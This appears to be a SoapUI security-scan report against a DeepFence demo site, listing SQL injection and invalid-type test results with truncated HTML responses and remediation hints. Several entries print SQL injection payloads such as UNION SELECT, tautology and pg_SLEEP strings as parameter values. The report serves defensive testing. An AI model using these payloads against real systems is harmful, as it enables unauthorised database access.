HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1936\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1937\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1938\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1939\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1940\nInvalid Types\nAn Invalid Types Scan tries to confuse the system under test by deliberately inserting incorrectly \ntyped data into your parameters, for example, a string containing letters into a numeric field.\nAlerts usually indicate that you need to improve input validation and error handling.\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iotrue\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1941\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioGpM7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1942Scan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io0FB7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1943\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-1E4f\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1944\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io12.45E+12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1945\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io-1.23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1946\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSoapUI is the best\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1947\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioP1Y2M3DT10H30M12.3S\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1948\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1999-05-31T13:20:00.000-05:00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since incorrectly typed data inserted into the parameter provoked demouser@deepfence.io \nan unexpected response, you may want to improve error handling in the code processing this \ninput.\nIssue Number #1949\nScan Invalid Types\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1999-05-31\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> 